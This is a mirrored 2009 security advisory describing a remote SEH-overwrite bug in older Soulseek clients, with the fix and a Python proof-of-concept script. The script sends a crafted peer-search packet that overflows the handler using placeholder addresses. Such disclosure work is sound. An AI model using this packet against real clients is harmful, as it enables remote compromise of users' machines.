首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Soulseek versions 157 NS below 13e and all versions of 156 suffer from a remote
来源:laurent.gaffie[at]gmail.com 作者:gaffie 发布时间:2009-07-06  
Soulseek 157 NS < 13e & 156.* Remote Peer Search Code Execution
=============================================
- Release date: July 02, 2009
- Discovered by: Laurent Gaffi� ; http://g-laurent.blogspot.com/
- Severity: critical
=============================================

I. VULNERABILITY
-------------------------
Soulseek 157 NS < 13e & 156.* Remote Peer Search Code Execution

II. BACKGROUND
-------------------------
"Soulseek(tm) is a unique ad-free, spyware free, and just plain free file
sharing application.
One of the things that makes Soulseek(tm) unique is our community and
community-related features.
Based on peer-to-peer technology, virtual rooms allow you to meet people
with
the same interests, share information, and chat freely using real-time
messages
in public or private.
Soulseek(tm), with its built-in people matching system, is a great way to
make
new friends and expand your mind!"

III. DESCRIPTION
-------------------------
Soulseek client allows direct peer file search, allowing a user to find the
files he wants directly on the
peer computer.
Unfortunatly this feature is vulnerable to a remote SEH overwrite.

IV. PROOF OF CONCEPT
-------------------------
This proof of concept will target a user called 123yow123.

import struct
import sys, socket
from time import *

ip = "IP_ADDR"
port = "PORT_NUM" #You can find out, how to find out IP/PORT if you RTFM :)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
 s.connect((ip,port))
except:
 print "Can\'t connect to peer!\n"
 sys.exit(0)

junk = "\x41" * 3084
next_seh = struct.pack('<L', 0x42424242)
seh = struct.pack('<L', 0x43434343)
other_junk = "\x61" * 1424

buffer = "\x17\x00\x00\x00\x01\x09\x00\x00\x00\x31\x32\x33\x79\x6f\x77\x31"
buffer+= "\x32\x33\x01\x00\x00\x00\x50\x00\x00\x00\x00\x21\x0c\x00\x00\x08"
buffer+=
"\x00\x00\x00\x6c\x7b\x1d\x0c\x15\x0c\x00\x00"+junk+next_seh+seh+other_junk

s.send(buffer)


After the query is send, the SEH handler will get overwriten.


V. BUSINESS IMPACT
-------------------------
An attacker could exploit this vulnerability to compromise any prior to 157
NS 13e Soulseek client

VI. SYSTEMS AFFECTED
-------------------------
Windows all versions

VII. SOLUTION
-------------------------
Upgrade to 157 NS 13e
(http://slsknet.org/download.html)

VIII. REFERENCES
-------------------------
http://www.slsknet.org

IX. CREDITS
-------------------------
This vulnerability has been discovered by Laurent Gaffi�
Laurent.gaffie{remove-this}(at)gmail.com


X. REVISION HISTORY
-------------------------
july 02, 2009

XI. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or
misuse of this information.

XII. PERSONAL NOTES
------------------------
Souleek team as patched this bug month ago, a distributed message urging
users to upgrade them Soulseek client
is still send since a month, and not much users still use vulnerable
Soulseek versions.
@to the one who like to rip bugs and make an exploit ""universal"" for fame,
just make sure it's at least
universal before you say so.
For the others : http://www.youtube.com/watch?v=tVACUjHn6yU   :)

@RIIA : http://www.openp2p.com/pub/a/p2p/2002/12/11/piracy.html

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·[0-Day] ShopCartDx <= v4.30 (p
·Joomla! versions prior to 1.5.
·[0-Day] ShopCartDx <= v4.30 (p
·win32 xp-sp3 beep and exitproc
·Local root exploit for FreeBSD
·Almnzm 2.0 Remote Blind SQL In
·YourTube <= 2.0 Arbitrary Data
·Microsoft DirectShow MPEG2Tune
·Oracle 10g SYS.LT.COMPRESSWORK
·Microsoft DirectShow MPEG2Tune
·Apple Safari 4.x JavaScript Re
·mail XSS的脚本
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved